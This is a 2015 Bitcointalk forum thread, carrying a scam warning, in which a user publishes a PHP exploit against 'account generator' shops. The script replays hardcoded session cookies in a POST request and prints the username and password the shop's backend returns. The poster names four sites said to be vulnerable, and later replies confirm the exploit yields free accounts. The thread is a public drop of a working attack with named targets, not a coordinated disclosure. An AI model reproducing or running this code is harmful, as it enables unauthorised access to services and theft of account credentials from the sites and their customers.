Bitcoin Forum
December 12, 2024, 03:50:09 AM *
News: Latest Bitcoin Core release: 28.0 [Torrent]
 
   Home   Help Search Login Register More  
Warning: One or more bitcointalk.org users have reported that they strongly believe that the creator of this topic is a scammer. (Login to see the detailed trust ratings.) While the bitcointalk.org administration does not verify such claims, you should proceed with extreme caution.
Pages: [1]
  Print  
Author Topic: Public Announcement for Digital Goods Generator shops. Exploit  (Read 1158 times)
bobc1994 (OP)
Sr. Member
****
Offline Offline

Activity: 269
Merit: 250



View Profile WWW
September 28, 2015, 05:34:31 PM
Last edit: September 28, 2015, 07:11:08 PM by bobc1994
 #1

Hey guys so I have been contacting multiple gen shop owners of this exploit but they either become very defensive or just ends up trying to make lies. Then they begin to act very rude to me.

Update: after this announcement owner of script gave up and doesn't know how to fix the script lol

I was very firm about not posting the exploit but due to multiple threats and lies from them I will just be posting it.

Disclaimer: It is not my fault if their site gets hacked as I warned them and they encouraged me to post. So if any owners blame me they already gave me permission to do so.

There is a 2nd exploit that dumps more stuff but that will be kept private for obvious reasons as it would not be allowed to be posted here

Alright so the exploit is a php code that you can host anywhere. Don't bother asking me on how to use this as you must already know what this does and how to use it.

The new owner of this source has been lying to members that this was a v1 exploit but it still works on v2 and the new owner has never updated the source at all! all he did was rename it which can be confirmed by talking to the original owner.

Code:
<?
if($_GET['auth']=="max"){
$url = '';

$options = array(
    'http' => array(
        'method'  => 'POST',
        'header'  =>   "Host:
" .
                "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
" .
                "X-Requested-With: XMLHttpRequest
" .
                "Cookie: ; remember_82e5d2c56bdd0811318f0cf078b78bfc=eyJpdiI6ImxuR21neVJucWE0VXRZYXpGd29WeXc9PSIsInZhbHVlIjoiOG1FM2NheHBGRUVDdE1qK2N4NzR0OGhUK3FxTE1zMEI4SzhmRGhsMHYwK2FEdkZTcjF1VlwvZDVsZE9tVTc0MFZuaHBxR2VxR1VSemdUczQyNjFIdFMxS3o0MzkrMW80Z2ZvOHlyXC9haHlPVT0iLCJtYWMiOiIzMmQ2OTI4MTk3OTI3NjVlYWNiZmFiMmVmNmZkZmQ3MTM0NDY5ZjBmY2RmOTQ1ODM5YTYwNWUzNGIzN2MxNDQzIn0%3D; __utma=191036587.1210061233.1437918069.1437944919.1437986125.3; __utmb=191036587.12.10.1437986125; __utmc=191036587; __utmz=191036587.1437918069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mcdispenser=eyJpdiI6Im1xa1ZJR3ZBMmhxOFE1eEpCSFI3eXc9PSIsInZhbHVlIjoiR2ZqTUZLQU12YWVUQTNkWkRka2U5MU90QUR4WVlJMWdhTWNKdTBTNEMwV0VBc09xOTZKT1RhRXQ1bkc5SVlrS1NkNFh5MlJ6MHBYVjQxcU5pTVwvNXl3PT0iLCJtYWMiOiJhMTRkMTNiNWI0MDM1ZTYxNmNkOGRjYzBiYmFkYjQzNTZhMDI0ZmQzZTE1NDQxYTQ5MTYyYWE4MGQ2ODdkMmIyIn0%3D


",
    ),
);
$context  = stream_context_create($options);
$result = file_get_contents($url, false, $context);
$up = json_decode($result);
$user = $up->username;
$pass = $up->password;
if($up->error == 'You may only generate an account once every 3 seconds.'){
echo 'err_3s';
}else{
echo $user . ':' . $pass;
}
}else{
echo "You aren't authorized to use this api!";
}
?>



Current shops exploitable:
premiumgen.xyz
vzngen.net
25cams.com
raidgenerator.com

also any shops you find that use similar source. There is currently only 1 shop I know here that has a fixed source and its not the ones above.

flystarjay
Newbie
*
Offline Offline

Activity: 9
Merit: 0


View Profile
September 28, 2015, 05:41:51 PM
 #2

https://bitcointalk.org/index.php?topic=1194832.msg12540096#msg12540096

Should the owners of those accounts buy from here? As I'm guessing the 1 in the link has no exploit?
bobc1994 (OP)
Sr. Member
****
Offline Offline

Activity: 269
Merit: 250



View Profile WWW
September 28, 2015, 05:44:41 PM
 #3

https://bitcointalk.org/index.php?topic=1194832.msg12540096#msg12540096

Should the owners of those accounts buy from here? As I'm guessing the 1 in the link has no exploit?

That version is fixed that I have but seems the owners are too hot headed to ignore me. So here I am.

Bluffer
Newbie
*
Offline Offline

Activity: 6
Merit: 0


View Profile
September 28, 2015, 06:01:21 PM
 #4

I tried hiring a coder to get the vulns fixed but everyone was an idiot and took to long to reply or didn't reply... so if somebody wants to fix the vulns I'd gladly pay them for mine.
bobc1994 (OP)
Sr. Member
****
Offline Offline

Activity: 269
Merit: 250



View Profile WWW
September 28, 2015, 06:04:32 PM
 #5

I tried hiring a coder to get the vulns fixed but everyone was an idiot and took to long to reply or didn't reply... so if somebody wants to fix the vulns I'd gladly pay them for mine.

You own a shop too?

Bluffer
Newbie
*
Offline Offline

Activity: 6
Merit: 0


View Profile
September 28, 2015, 06:27:37 PM
 #6

I do run the best generator on Hackforums, yep.
bobc1994 (OP)
Sr. Member
****
Offline Offline

Activity: 269
Merit: 250



View Profile WWW
September 28, 2015, 06:52:04 PM
 #7

I do run the best generator on Hackforums, yep.


alright hit u up a pm

tifossi
Hero Member
*****
Offline Offline

Activity: 686
Merit: 500



View Profile
September 28, 2015, 07:40:34 PM
 #8

Is it possible with this exploit that people can generate accounts for free?
bobc1994 (OP)
Sr. Member
****
Offline Offline

Activity: 269
Merit: 250



View Profile WWW
September 28, 2015, 09:42:38 PM
 #9

Is it possible with this exploit that people can generate accounts for free?

yeah you can do a lot...

https://bitcointalk.org/index.php?topic=1148789.msg12546237#msg12546237

Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!